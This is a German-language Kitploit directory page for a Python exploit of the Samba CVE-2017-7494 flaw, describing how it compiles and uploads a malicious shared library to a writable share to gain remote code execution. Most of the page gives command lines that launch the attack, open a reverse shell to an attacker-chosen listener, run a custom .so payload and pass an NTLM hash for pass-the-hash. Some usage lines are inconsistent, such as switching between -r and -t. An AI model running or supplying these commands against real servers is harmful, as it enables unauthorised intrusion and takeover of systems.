Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
noSAMBAnoCRY-CVE-2017-7494 — CVE-2017-7494 Python-Exploit | Kitploit
Tools/GitHubGitHub/0xm4ud/nosambanocry-cve-2017-7494
Payload-GenerierungSchwachstellenanalyseExploitationShellcodePenetrationstestsRemote-Access-Tool
GitHub0xm4ud/nosambanocry-cve-2017-7494

noSAMBAnoCRY-CVE-2017-7494

CVE-2017-7494 Python-Exploit

Repository anzeigen
61vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

noSAMBAnoCRY CVE-2017-7494

Remote-Exploit für die SAMBA CVE-2017-7494-Sicherheitslücke, auch bekannt als is_know_pipename!

Details

Dieser Exploit ist in 3 Teile unterteilt:

  • Kompiliert die evilLib für folgende Architekturen: x86_64, x86 oder i686
  • Findet eine beschreibbare Freigabe und lädt evilLib darauf hoch!
  • Lädt evilLib – wenn alles gut geht, RCE!

Solange das Ziel verwundbar ist und der Payload für das Zielbetriebssystem und die Architektur korrekt ist, ist der Exploit recht zuverlässig.

Anleitung

Führen Sie den Exploit gegen Ihr Ziel aus und warten Sie, bis die Shell erscheint:

root@kitploit:~
$ python noSAMBAnoCRY.py -r RHOST
root@kitploit:~
$ python noSAMBAnoCRY.py -r RHOST -u userTest -P 123 --lhost RevShellIP --lport RevShellPort 

Für Samba-Versionen 3.5.0 bis 3.6.0 müssen Sie lediglich das Argument -o 1 hinzufügen.

root@kitploit:~
python noSAMBAnoCRY.py -r RHOST --lhost LHOST --lport LPORT -o 1

Eigenes benutzerdefiniertes .so ausführen

root@kitploit:~
$ python noSAMBAnoCRY.py -r RHOST -u userTest --hashes 00000000000000000000000000000000:3DBDE697D71690A769204BEB12283678 -c cp.so

Für einen benutzerdefinierten Samba-Port verwenden Sie das Argument -p

root@kitploit:~
$ python noSAMBAnoCRY.py -t RHOST -p 4450 -u userTest -P 123 --rhost shell_ip --rport shell_port

Falls Sie auf smbpasswd-Hashes stoßen und diese nicht knacken können, können Sie jetzt Pass-the-Hash mit dem Argument --hashes=LM:NT verwenden.

root@kitploit:~
$ python noSAMBAnoCRY.py -r RHOST -u userTest --hashes=00000000000000000000000000000000:3DBDE697D71690A769204BEB12283678 --lhost RevShellIP

Haftungsausschluss

Dieses Repository ist inspiriert von den Repositories: joxeankoret/exploit-CVE-2017-7494 und Archivaldo

Tool herunterladen